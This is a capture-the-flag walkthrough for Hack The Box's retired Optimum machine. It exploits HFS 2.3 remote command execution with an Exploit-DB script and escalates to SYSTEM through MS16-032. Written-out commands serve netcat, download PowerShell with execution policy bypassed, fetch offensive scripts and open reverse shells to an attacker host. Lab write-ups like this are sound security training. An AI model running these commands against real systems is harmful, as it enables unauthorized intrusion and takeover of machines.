This walkthrough is for HacktheBox.eu‘s retired machine named Optimum.
We pick Optimum from the list:
We start with the usual nmap:
nmap -sS -T4 -A -p- 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-11 12:48 EDT Nmap scan report for optimum.htb (10.10.10.8) Host is up (0.12s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 (90%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 129.85 ms 10.10.14.1 2 130.06 ms optimum.htb (10.10.10.8) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 188.32 seconds
While it loads, we try to see if there is a web portal on the default port
Okay so we have a website. Let’s run a directory scan while we look around.
dirb http://10.10.10.8/ -i
At the bottom, when we hover or click the link, we see it goes to
https://rejetto.com/hfs/, which tells us what type of service it is running and the link itself tells us the version.
We can do a search for any vulnerabilities:
There are a few remote exploits compatible with version
Since our nmap scan results is fairly certain it is running a version of Windows, we can select the third one on the list:
searchsploit -x 39161
Basically the search function has a poor validated regex and allows the pipe in the URL to execute commands. In this script it setups a
vbscript to run while pulling a
nc.exe we will provide so we can connect through a reverse shell.
We make a copy of the python file:
cp /usr/share/exploitdb/exploits/windows/remote/39161.py optimum.py
Let’s open the file and make our changes:
Update the local IP to our Kali machine. You can also change the listener port if you’d like:
ip_addr = "10.10.XXX.XXX" #local IP address local_port = "443" # Local Port number
Now the exploit script let’s us know we have to setup a web server on port
80 to pass the
nc.exe file. If you are don’t want to use port
80 you could alter the
I will leave the default.
Save and exit with
Find a copy of
nc.exe to run for Windows:
We then copy one to our directory and setup the web server:
cp /usr/share/windows-resources/binaries/nc.exe . python -m SimpleHTTPServer 80
Setup a listener before we run our python script:
nc -lvp 443
Now we can run it:
python optimum.py 10.10.10.8 80
Notice it taking our
It works. We get connected.
We have a user:
kostas and we start off in their directory. From here we can get our user flag.
Now let’s do some enumeration to do a privilege escalation.
On our local machine we can copy and paste the
systeminfo output into a file.
Paste the output in and save and exit with
With this, we can use a comparative tool, Windows Exploit Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester that will figure out what vulnerabilities this machine may have.
Get the database:
apt -y install python-xlrd
Run the comparison:
python windows-exploit-suggester.py --systeminfo optimum-sysinfo.txt --database BulletinSearch.xlsx
This gives a good list of possible vulnerabilities with PoC exploit examples.
After going through and weeding out different exploits, we can start to attempt MS16-032.
Copy over the file:
cp /usr/share/exploitdb/exploits/windows/local/39719.ps1 .
Open the file to examine and edit:
It shows that we need to run the function
Invoke-MS16-032 so we can add it to the end of the file so it runs once it builds the function. We could also import it but at this point we want it all done in one command.
Make sure our python web server is running still or we can re-initiate it, we go back to our Remote shell and download our new file:
powershell.exe -exec Bypass -nonI -window Hidden (new-object System.Net.WebClient).DownloadFile('http://10.10.XX.XX/39719.ps1','C:\Users\kostas\Desktop\39719.ps1')
Then run the file:
powershell.exe -exec Bypass -nonI -window Hidden .\39719.ps1
The script runs, however it fails.
After looking around as to why, we realize it is defaulting to 32-bit powershell. I update the path and try it again:
%systemroot%\sysnative\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -nonI -window Hidden .\39719.ps1
This is successful however we don’t get access to the spawned shell.
After looking a round online I found two scripts that can help us out, which we can download:
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 && wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1
Invoke-MS16032.ps1 file is an updated version of our original exploit script except it allows commands to be run after the fact. Once I found that I attempted to run a few commands like netcat with powershell with a reverse shell to catch it but ran into a few troubles. So after more online research I found a reverse shell powershell script.
What I ended up doing was merging the functions into the same file then running the
Invoke-MS16032 function and passing the
Invoke-PowerShellTcp command with a reverse shell running on port 444.
Invoke-MS16032 -Command ("Invoke-PowerShellTcp -Reverse -IPAddress 10.10.X.X -Port 444")
Then we can copy the file over to the Remote shell:
powershell.exe -exec Bypass -nonI -window Hidden (new-object System.Net.WebClient).DownloadFile('http://10.10.XX.XX/Invoke-MS16032.ps1','C:\Users\kostas\Desktop\Invoke-MS16032.ps1')
Then on our Local machine we can set another listener:
nc -lvp 444
On the Remote shell run the file:
%systemroot%\sysnative\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -nonI -window Hidden .\Invoke-MS16032.ps1
Then we go to our listener on our Local machine:
And we can see we get system access.
We can then go for the root flag:
Success 😎 .